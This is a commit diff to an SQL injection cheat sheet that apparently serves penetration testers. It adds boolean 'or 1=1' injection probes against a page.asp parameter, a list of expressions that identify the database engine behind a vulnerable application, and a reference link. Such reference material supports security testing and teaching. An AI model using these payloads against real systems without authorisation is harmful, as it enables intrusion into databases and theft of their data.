Oracle SQL + SQL injection updates (MS SQL/MYSQL/ GENERAL)

2025-10-29 16:57:02 +00:00 · 2018-04-27 23:31:58 +02:00
parent 8209d32baf
commit cb3b298451
6 changed files with 220 additions and 9 deletions
--- a/injection/README.md
+++ b/injection/README.md
@@ -34,6 +34,14 @@ Merging characters
 '%2B'HERP
 ```

+Logic Testing
+```
+page.asp?id=1 or 1=1 -- true
+page.asp?id=1' or 1=1 -- true
+page.asp?id=1" or 1=1 -- true
+page.asp?id=1 and 1=2 -- false
+```
+
 Weird characters
 ```
 Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
@@ -42,6 +50,35 @@ Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
 transformed into U+0027 APOSTROPHE (')
 ```

+## DBMS Identification
+```
+["conv('a',16,2)=conv('a',16,2)"                   ,"MYSQL"],
+["connection_id()=connection_id()"                 ,"MYSQL"],
+["crc32('MySQL')=crc32('MySQL')"                   ,"MYSQL"],
+["BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)"       ,"MSSQL"],
+["@@CONNECTIONS>0"                                 ,"MSSQL"],
+["@@CONNECTIONS=@@CONNECTIONS"                     ,"MSSQL"],
+["@@CPU_BUSY=@@CPU_BUSY"                           ,"MSSQL"],
+["USER_ID(1)=USER_ID(1)"                           ,"MSSQL"],
+["ROWNUM=ROWNUM"                                   ,"ORACLE"],
+["RAWTOHEX('AB')=RAWTOHEX('AB')"                   ,"ORACLE"],
+["LNNVL(0=123)"                                    ,"ORACLE"],
+["5::int=5"                                        ,"POSTGRESQL"],
+["5::integer=5"                                    ,"POSTGRESQL"],
+["pg_client_encoding()=pg_client_encoding()"       ,"POSTGRESQL"],
+["get_current_ts_config()=get_current_ts_config()" ,"POSTGRESQL"],
+["quote_literal(42.5)=quote_literal(42.5)"         ,"POSTGRESQL"],
+["current_database()=current_database()"           ,"POSTGRESQL"],
+["sqlite_version()=sqlite_version()"               ,"SQLITE"],
+["last_insert_rowid()>1"                           ,"SQLITE"],
+["last_insert_rowid()=last_insert_rowid()"         ,"SQLITE"],
+["val(cvar(1))=1"                                  ,"MSACCESS"],
+["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0"               ,"MSACCESS"],
+["cdbl(1)=cdbl(1)"                                 ,"MSACCESS"],
+["1337=1337",   "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
+["'i'='i'",     "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
+```
+

 ## SQL injection using SQLmap
 Basic arguments for SQLmap
@@ -349,6 +386,7 @@ mysql> mysql> select version();
 ## Thanks to - Other resources
 * Detect SQLi
  - [Manual SQL Injection Discovery Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
+  - [NetSPI SQL Injection Wiki](https://sqlwiki.netspi.com/)
 * MySQL:
  - [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
  - [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)